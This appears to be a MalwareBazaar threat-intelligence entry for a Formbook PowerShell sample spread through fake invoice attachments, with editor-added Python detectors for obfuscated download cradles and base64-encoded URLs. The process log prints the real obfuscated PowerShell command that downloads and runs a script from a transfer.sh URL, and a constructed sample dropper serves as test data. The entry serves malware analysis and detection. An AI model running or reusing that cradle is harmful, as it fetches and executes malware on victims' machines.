MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 389358ac51f2b51b2425cface223f89a56f7715262829c5731fe5a4da3d40a11. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Formbook
Vendor detections: 6

SHA256 hash: 389358ac51f2b51b2425cface223f89a56f7715262829c5731fe5a4da3d40a11
SHA3-384 hash: 928e02c01732f7d31a4aadd625cfbfe5f3a8be77a2e68ca037584494d9ea55d2514ac735048ce2bab70e0f223fbe5d4a
SHA1 hash: d16de10e43cf8f07be14d13599a459fc3f9a83c7
MD5 hash: 1623e62971b6cbe70bf5dc56198ab4b6
humanhash: gee-september-oven-purple
File name: transfer.sh_get_9GqmOG_jramooooss.ps1
Signature: Formbook
File size: 2'273 bytes
First seen: 2022-04-03 12:06:58 UTC
Last seen: Never
File type: PowerShell (PS) ps1
MIME type: text/plain
ssdeep: 48:tmq1543FrMYF3gNZE+KbyN1r60NkwKzwvHWuc7:tTorT4/lN1r9NTiyHrC
Threatray: 531 similar samples on MalwareBazaar
TLSH: T1F841D9DCD28F3894E2D88725E778BCCB954569ED3BE30341C70AA8041472987A9BE42D
Reporter: c_APT_ure
Tags: exe powershell ps1 vbs


c_APT_ure
--- mail attachments (spaces replaced with [_X]) ---
49e864fe28310b2adc782a975aaa5b67 ./Revised_Invoice_#03252022.iso
e0e7f44f32d0b3dabb08bd61a3b81f6a ./Revised_Invoice_#03252022.vbs

--- processes created ---
* pid="2660" / md5="979D74799EA6C8B8167869A68DF5204A" / parentpid="1452"
path="C:\Windows\System32\wscript.exe" / cmdline="C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Revised_Invoice_x2303252022.vbs'"
* pid="2688" / md5="92F44E405DB16AC55D97E3BFE3B132FA" / parentpid="2660"
path="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" / cmdline="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -exeCutiO BYpASS -C I`eX(n`EW-Ob`J`EcT nET`.weBCLi`ENt).DoWnloAdStRiNG('https://transfer.sh/get/9GqmOG/jramooooss.ps1') "

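The process chain in the reporter's notes (wscript.exe running the .vbs attachment, then spawning a powershell.exe whose command line splits every keyword with backticks and random case) is the parent/child pattern an EDR or Sysmon rule keys on. The block below is an added example by the editor, not code from MalwareBazaar or the reporter: it normalizes the backtick-and-case obfuscation, checks the command line for the download-cradle indicators, and records the parent process and the plaintext URL. The process records are constructed to mirror the two processes listed above; the explorer.exe record for pid 1452 is an assumption, since the page gives that pid only as the parent of wscript.exe.

```python
import re

# Constructed process-creation records mirroring the two processes in the
# reporter's notes. The explorer.exe record for pid 1452 is an assumption;
# the page only gives that pid as the parent of wscript.exe.
RECORDS = [
    {"pid": 1452, "parentpid": 1,
     "path": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 2660, "parentpid": 1452,
     "path": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Revised_Invoice_x2303252022.vbs'"},
    {"pid": 2688, "parentpid": 2660,
     "path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -exeCutiO BYpASS "
                r"-C I`eX(n`EW-Ob`J`EcT nET`.weBCLi`ENt)"
                r".DoWnloAdStRiNG('https://transfer.sh/get/9GqmOG/jramooooss.ps1') "},
]

# Script hosts that a double-clicked mail attachment lands in; a powershell.exe
# child of one of these deserves a closer look.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# Indicators matched against the normalized command line. powershell.exe
# accepts any unambiguous prefix of a parameter name, which is why the sample
# can write -exeCutiO for -ExecutionPolicy; "-ex\w*" covers every spelling.
INDICATORS = {
    "executionpolicy_bypass": re.compile(r"-ex\w*\s+bypass"),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b"),
    "webclient": re.compile(r"new-object\s+(?:system\.)?net\.webclient"),
    "download_cradle": re.compile(r"\.(?:downloadstring|downloadfile|downloaddata)\s*\("),
}
URL_RE = re.compile(r"https?://[^\s'\")]+")


def normalize(cmdline: str) -> str:
    """Undo the sample's obfuscation: the backtick is PowerShell's escape
    character and is a no-op in front of an ordinary letter (I`eX == IEX),
    and command names are case-insensitive. Real escapes such as `n can only
    appear inside string literals, so dropping every backtick cannot hide a
    cmdlet or method name from the patterns above."""
    return cmdline.replace("`", "").lower()


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def find_cradles(records):
    """Return one finding per powershell.exe whose command line carries at
    least one indicator, with its parent process and any plaintext URL."""
    by_pid = {r["pid"]: r for r in records}
    findings = []
    for rec in records:
        if basename(rec["path"]) != "powershell.exe":
            continue
        norm = normalize(rec["cmdline"])
        matched = sorted(name for name, rx in INDICATORS.items() if rx.search(norm))
        if not matched:
            continue
        parent = by_pid.get(rec["parentpid"])
        parent_name = basename(parent["path"]) if parent else None
        findings.append({
            "pid": rec["pid"],
            "parent": parent_name,
            "spawned_by_script_host": parent_name in SCRIPT_HOSTS,
            "indicators": matched,
            # URLs come from the raw command line: lower-casing would corrupt
            # the case-sensitive path, and a single-quoted PowerShell string
            # keeps any backtick literally.
            "urls": URL_RE.findall(rec["cmdline"]),
        })
    return findings


if __name__ == "__main__":
    for finding in find_cradles(RECORDS):
        print(finding)
```

Normalizing before matching is what makes the rule survive this obfuscation family; matching the raw string would need a separate pattern for every backtick placement. The parent check is kept as a separate field rather than a hard requirement, so a cradle launched from Office or a LNK still surfaces, with the script-host parent raising its priority.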
Intelligence


File Origin
# of uploads: 1
# of downloads: 530
Origin country: n/a
Vendor Threat Intelligence

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: powershell

Result
Verdict: MALICIOUS
Details: Base64 Encoded URL
Detected an ANSI or UNICODE http:// or https:// base64-encoded URL prefix.
Threat name: Script-PowerShell.Trojan.Heuristic
Status: Malicious
First seen: 2022-03-25 19:26:19 UTC
File type: Text (PowerShell)
AV detection: 7 of 42 (16.67%)
Threat level: 2/5

Result
Malware family: n/a
Score: 8/10
Tags: n/a
Behaviour:
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Blocklisted process makes network request
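The "Base64 Encoded URL" detail in the vendor verdict above names a cheap but effective heuristic: base64 of a fixed prefix is itself fixed once the triplet alignment is known, so http:// and https:// in ANSI (single-byte) and UNICODE (UTF-16LE) text give twelve short signatures that can be searched in raw script text without decoding anything. The block below is an added example by the editor, not the vendor's or MalwareBazaar's code. It derives the signatures, scans a constructed PowerShell dropper (not the real jramooooss.ps1) for them, and decodes each flagged run to recover the hidden URL; the example.invalid URLs and the sample script are made up for the demonstration.

```python
import base64
import re

PREFIXES = (b"http://", b"https://")
# "ANSI" = single-byte text, "UNICODE" = UTF-16LE: the two string encodings a
# Windows script is likely to use before base64-encoding a URL.
CODECS = {"ansi": "ascii", "unicode": "utf-16-le"}
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
URL_IN_TEXT = re.compile(r"https?://[^\s'\"<>()]+")


def b64_signature(text: bytes, k: int) -> str:
    """Base64 characters fully determined by `text` when it starts at byte
    offset k (0, 1 or 2) within a base64 triplet. Whatever precedes the URL
    in the plaintext shifts the alignment, so each prefix has three spellings
    per codec; characters that mix in neighbouring bytes are dropped."""
    enc = base64.b64encode(b"\x00" * k + text).decode("ascii")
    first_clean = (0, 2, 3)[k]               # earlier chars depend on the k unknown bytes
    last_clean = 4 * ((k + len(text)) // 3)  # only complete triplets are text-only
    return enc[first_clean:last_clean]


# Twelve signatures: 2 prefixes x 2 codecs x 3 alignments.
SIGNATURES = [
    (label, prefix.decode("ascii"), k,
     b64_signature(prefix.decode("ascii").encode(codec), k))
    for label, codec in CODECS.items()
    for prefix in PREFIXES
    for k in range(3)
]


def decode_run(blob: str) -> bytes:
    """Lenient decode: scripts often drop the '=' padding, and a run clipped
    mid-quartet still decodes once a dangling single character is removed."""
    blob = blob.rstrip("=")
    if len(blob) % 4 == 1:
        blob = blob[:-1]
    return base64.b64decode(blob + "=" * (-len(blob) % 4))


def find_encoded_urls(data: bytes):
    """Scan raw script bytes for base64 runs carrying one of the signatures,
    then decode each flagged run and recover the URL it hides."""
    findings = []
    for run in B64_RUN.finditer(data):
        blob = run.group().decode("ascii")
        for label, prefix, k, sig in SIGNATURES:
            if sig not in blob:
                continue
            raw = decode_run(blob)
            codec = CODECS[label]
            start = raw.find(prefix.encode(codec))
            if start < 0:
                continue
            # Slice before decoding so a UTF-16 URL at an odd byte offset is
            # still aligned; whatever follows the URL is ignored.
            text = raw[start:].decode(codec, errors="ignore")
            m = URL_IN_TEXT.match(text)
            if m:
                findings.append({"offset": run.start(), "encoding": label,
                                 "alignment": k, "url": m.group()})
                break
    return findings


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


# Constructed sample script (not the real jramooooss.ps1): one ASCII URL at
# alignment 0, one UTF-16LE URL pushed to alignment 1 by two leading
# characters, and a benign blob that must not be reported.
SAMPLE_PS1 = (
    "$c = New-Object Net.WebClient\n"
    "$u1 = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
    + _b64(b"http://example.invalid/a.exe") + "'))\n"
    "$u2 = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
    + _b64("abhttps://example.invalid/stage2.bin".encode("utf-16-le")) + "')).Substring(2)\n"
    "$tag = [Convert]::FromBase64String('"
    + _b64(b"nothing to see here, just a marker") + "')\n"
)

if __name__ == "__main__":
    for finding in find_encoded_urls(SAMPLE_PS1.encode("ascii")):
        print(finding)
```

Searching for the signatures first and decoding only the runs that hit keeps the scan cheap and lets it fire on fragments, such as a blob split across string concatenations, where a decode-everything approach would fail; the decode step then turns a heuristic hit into an actionable URL.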

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Malspam
Formbook
PowerShell (PS) ps1 389358ac51f2b51b2425cface223f89a56f7715262829c5731fe5a4da3d40a11 (this sample)

Delivery method: Distributed via e-mail attachment
